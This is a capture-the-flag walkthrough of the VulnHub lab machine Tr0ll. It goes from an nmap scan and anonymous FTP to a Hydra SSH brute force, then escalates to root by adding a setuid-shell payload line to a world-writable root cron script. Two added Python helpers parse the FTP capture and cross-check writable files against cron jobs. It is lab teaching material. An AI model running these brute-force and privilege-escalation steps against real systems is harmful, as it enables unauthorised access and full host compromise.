Pentest Lab - Tr0ll

[Download]: http://vulnhub.com/entry/tr0ll-1,100/

offensive@security:~$ nmap -n -sV 192.168.108.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-12 01:50 EDT
Nmap scan report for 192.168.108.1
Host is up (0.0019s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Dynamode/Motorola WAP http config
Service Info: Device: WAP

Nmap scan report for 192.168.108.193
Host is up (0.00041s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.108.194
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=9/12%Time=54128998%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service Info: OS: Unix

Nmap scan report for 192.168.108.197
Host is up (0.00026s latency).
All 1000 scanned ports on 192.168.108.197 are closed

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.53 seconds

ftp> open 192.168.108.194
Connected to 192.168.108.194.
220 (vsFTPd 3.0.2)
Name (192.168.108.194:offensive):anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode(192,168,108,194,58,86).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
227 Entering Passive Mode(192,168,108,194,223,49).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (4746.3 kB/s)
ftp> quit
221 Goodbye.


offensive@security:~$ strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
QUIT
221 Goodbye.
Counters provided by dumpcap
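strings(1) is enough to spot the directory name, but it mixes the FTP text with binary noise and gives no way to tell client from server or control channel from data channel. The following is an added example for this write-up (not code from the original post or the Tr0ll author): a small pure-Python libpcap reader that reassembles the TCP payload exchanged on a given port, in capture order. It assumes the classic libpcap container (not pcapng) with Ethernet/IPv4/TCP framing, which is what dumpcap on eth0 produces. The capture bytes it runs on are a constructed fixture modelled on the exchange above so the script works offline; feed it `open("lol.pcap", "rb").read()` for the real file.

```python
"""Rebuild an FTP session from a libpcap capture (added example, constructed fixture)."""
import struct

LINKTYPE_ETHERNET = 1
MAGICS = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">",   # microsecond timestamps
          b"\x4d\x3c\xb2\xa1": "<", b"\xa1\xb2\x3c\x4d": ">"}   # nanosecond timestamps


def iter_records(data):
    """Yield each captured frame from a libpcap (not pcapng) byte string."""
    endian = MAGICS.get(data[:4])
    if endian is None:
        raise ValueError("not a libpcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24                                   # skip the 24-byte global header
    while off + 16 <= len(data):               # each record: 16-byte header + incl_len bytes
        incl_len = struct.unpack(endian + "I", data[off + 8:off + 12])[0]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame):
    """Return (src_ip, sport, dst_ip, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType must be IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                         # protocol must be TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    dotted = lambda b: ".".join(str(x) for x in b)
    return dotted(ip[12:16]), sport, dotted(ip[16:20]), dport, tcp[data_off:]


def ftp_conversation(pcap_bytes, port=21):
    """Lines exchanged on `port`, tagged S: (sent from that port) or C: (sent to it)."""
    lines = []
    for frame in iter_records(pcap_bytes):
        seg = tcp_payload(frame)
        if seg is None:
            continue
        _src, sport, _dst, dport, payload = seg
        if port not in (sport, dport) or not payload:
            continue
        tag = "S" if sport == port else "C"
        lines += [f"{tag}: {l}" for l in payload.decode("latin-1").splitlines() if l]
    return lines


# --- constructed fixture: an FTP exchange between two hosts plus one unrelated HTTP frame ---
def _ip(s):
    return bytes(int(x) for x in s.split("."))

def _frame(src, sport, dst, dport, payload):
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, _ip(src), _ip(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip     # checksums left at 0; the parser never checks them

def _pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out

SRV, CLI = "10.0.0.6", "10.0.0.12"            # addresses taken from the strings output above
SAMPLE_PCAP = _pcap([
    _frame(SRV, 21, CLI, 43210, b"220 (vsFTPd 3.0.2)\r\n"),
    _frame(CLI, 43210, SRV, 21, b"USER anonymous\r\n"),
    _frame(SRV, 21, CLI, 43210, b"331 Please specify the password.\r\n"),
    _frame(CLI, 43210, SRV, 21, b"PASS password\r\n"),
    _frame(SRV, 21, CLI, 43210, b"230 Login successful.\r\n"),
    _frame(CLI, 43210, SRV, 21, b"RETR secret_stuff.txt\r\n"),
    _frame(SRV, 20, CLI, 44486, b"you almost found the sup3rs3cr3tdirlol :-P\n"),  # active-mode data channel
    _frame(CLI, 51000, SRV, 80, b"GET / HTTP/1.0\r\n\r\n"),                       # noise, must be filtered out
])


def demo():
    """(control channel on port 21, data channel on port 20) from the fixture."""
    return ftp_conversation(SAMPLE_PCAP), ftp_conversation(SAMPLE_PCAP, port=20)


if __name__ == "__main__":
    control, data = demo()
    print("\n".join(control + ["-- data channel --"] + data))
```

Because the capture is active-mode FTP (the client sends PORT), the file contents travel on a separate connection from server port 20, which is why the data channel is read with `port=20`; in passive mode you would take the port from the 227 reply instead.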


http://192.168.108.194/
http://192.168.108.194/robots.txt
http://192.168.108.194/sup3rs3cr3tdirlol/
http://192.168.108.194/sup3rs3cr3tdirlol/roflmao


offensive@security:~$ exiftool roflmao
ExifTool Version Number         : 8.60
File Name                       : roflmao
Directory                       : .
File Size                       : 7.1 kB
File Modification Date/Time     : 2014:09:11 23:02:06-04:00
File Permissions                : rw-r--r--
File Type                       : ELF executable
MIME Type                       : application/octet-stream
CPU Architecture                : 32 bit
CPU Byte Order                  : Little endian
Object File Type                : Executable file
CPU Type                        : i386


offensive@security:~$ strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"


http://192.168.108.194/0x0856BF/
http://192.168.108.194/0x0856BF/good_luck/which_one_lol.txt
http://192.168.108.194/0x0856BF/this_folder_contains_the_password/Pass.txt


offensive@security:~$ cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
offensive@security:~$ cat Pass.txt
Good_job_:)


offensive@security:~$ hydra -F -V -L which_one_lol.txt -p Pass.txt -S 192.168.108.194 ssh
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2014-09-12 01:21:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.108.194 - login "maleus" - pass "Pass.txt" - 1 of 10 [child 0]
[ATTEMPT] target 192.168.108.194 - login "ps-aux" - pass "Pass.txt" - 2 of 10 [child 1]
[ATTEMPT] target 192.168.108.194 - login "felux" - pass "Pass.txt" - 3 of 10 [child 2]
[ATTEMPT] target 192.168.108.194 - login "Eagle11" - pass "Pass.txt" - 4 of 10 [child 3]
[ATTEMPT] target 192.168.108.194 - login "genphlux < -- Definitely not this one" - pass "Pass.txt" - 5 of 10 [child 4]
[ATTEMPT] target 192.168.108.194 - login "usmc8892" - pass "Pass.txt" - 6 of 10 [child 5]
[ATTEMPT] target 192.168.108.194 - login "blawrg" - pass "Pass.txt" - 7 of 10 [child 6]
[ATTEMPT] target 192.168.108.194 - login "wytshadow" - pass "Pass.txt" - 8 of 10 [child 7]
[ATTEMPT] target 192.168.108.194 - login "vis1t0r" - pass "Pass.txt" - 9 of 10 [child 8]
[ATTEMPT] target 192.168.108.194 - login "overflow" - pass "Pass.txt" - 10 of 10 [child 9]
[RE-ATTEMPT] target 192.168.108.194 - login "wytshadow" - pass "Pass.txt" - 10 of 10 [child 7]
[22][ssh] host: 192.168.108.194   login: overflow   password: Pass.txt
[STATUS] attack finished for 192.168.108.194 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-09-12 01:21:32


$ find / -type f -perm -0002 -print 2>/dev/null | grep -v "/proc/"
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/10.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py


/lib/log/cleaner.py is world-writable and is executed periodically by root (the world-writable /var/log/cronlog in the listing above is the pointer; the timestamps on the script and on the resulting /tmp/sh below bear it out), so anything written into it runs as root. The original script only emptied /tmp; the second os.system() line is the payload added to it.

$ ls -l /lib/log/cleaner.py
-rwxrwxrwx 1 root root 185 Sep 11 20:57 /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('cp /bin/sh /tmp/sh && chown root:root /tmp/sh && chmod 4775 /tmp/sh')
except:
     sys.exit()


$ ls -l /tmp/
total 112
-rwsrwxr-x 1 root root 112204 Sep 11 22:28 sh
$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
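The find command above lists every world-writable file, but only one of them matters: the one a privileged process executes. The following is an added example for this write-up (not code from the original post or the Tr0ll author) that does the same enumeration in Python and adds that missing cross-check against cron. `demo()` builds a throwaway directory tree and a constructed /etc/crontab text modelled on this box's setup (a root cron entry running /lib/log/cleaner.py), so nothing outside a temporary directory is read or written; on a live host you would call `world_writable_files("/")` and `writable_cron_targets("/", open("/etc/crontab").read())`, and repeat for each file under /etc/cron.d.

```python
"""World-writable files cross-checked against root cron jobs (added example, constructed fixture)."""
import os
import re
import stat
import tempfile


def world_writable_files(root="/", skip=("proc", "sys", "dev")):
    """Equivalent of `find ROOT -type f -perm -0002`, skipping pseudo-filesystems."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:                                   # prune /proc, /sys, /dev at the top
            dirnames[:] = [d for d in dirnames if d not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                found.append(path)
    return sorted(found)


def cron_commands(crontab_text):
    """Yield (user, command) from system-crontab lines: 5 time fields or an @keyword, then the user."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):   # blank, comment, VAR=value
            continue
        n = 2 if line.startswith("@") else 6
        fields = line.split(None, n)
        if len(fields) == n + 1:
            yield fields[n - 1], fields[n]


def writable_cron_targets(root, crontab_text):
    """[(user, path, command)] for every absolute path named in a cron command that is world-writable."""
    writable = set(world_writable_files(root))
    hits = []
    for user, cmd in cron_commands(crontab_text):
        for token in re.findall(r"/[\w./-]+", cmd):
            if os.path.join(root, token.lstrip("/")) in writable:
                hits.append((user, token, cmd))
    return hits


# constructed /etc/crontab fixture, modelled on the Tr0ll box's cron job
CRONTAB = """\
# /etc/crontab (constructed)
SHELL=/bin/sh
*/2 * * * * root /lib/log/cleaner.py
0 3 * * *   root /usr/local/bin/backup.sh
"""


def demo():
    """Returns (world-writable files relative to the fixture root, flagged cron targets)."""
    with tempfile.TemporaryDirectory() as root:
        def put(rel, mode):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        put("lib/log/cleaner.py", 0o777)        # writable AND run by root: the escalation path
        put("usr/local/bin/backup.sh", 0o755)   # run by root but not writable: fine
        put("srv/ftp/lol.pcap", 0o777)          # writable but nothing executes it: listed, not flagged
        ww = [os.path.relpath(p, root) for p in world_writable_files(root)]
        return ww, writable_cron_targets(root, CRONTAB)


if __name__ == "__main__":
    ww, hits = demo()
    print("world-writable:", ww)
    for user, path, cmd in hits:
        print(f"cron runs {path} as {user} via '{cmd}': anyone can edit it")
```

The same cross-check applies to any privileged executor, not just cron: systemd timers, init scripts and setuid binaries that call out to scripts are worth matching against the world-writable list in the same way.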


$ /tmp/sh
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!


702a8c18d29c6f3ca0d99ef5712bfbdc



Tips:
1. How to brute-force SSH/FTP logins? (Metasploit vs. Hydra; compare the two.)
   Metasploit SSH login scanner
     -- use auxiliary/scanner/ssh/ssh_login

   Hydra (write the options with exact syntax, no stray spaces):
     -- hydra -F -V -L user.txt -P pass.txt 192.168.1.100 -S ssh
     Uppercase -L/-P read user names/passwords from files; lowercase -l/-p take a single literal value.
     That distinction is the trick in this box: Pass.txt contains "Good_job_:)", but the real password
     is the string "Pass.txt" itself, which is why the run above used -p Pass.txt and hydra reported
     password:Pass.txt for overflow. -F stops after the first valid pair, -V prints every attempt.

2. How to compile Hydra yourself.

3. Linux privilege escalation.
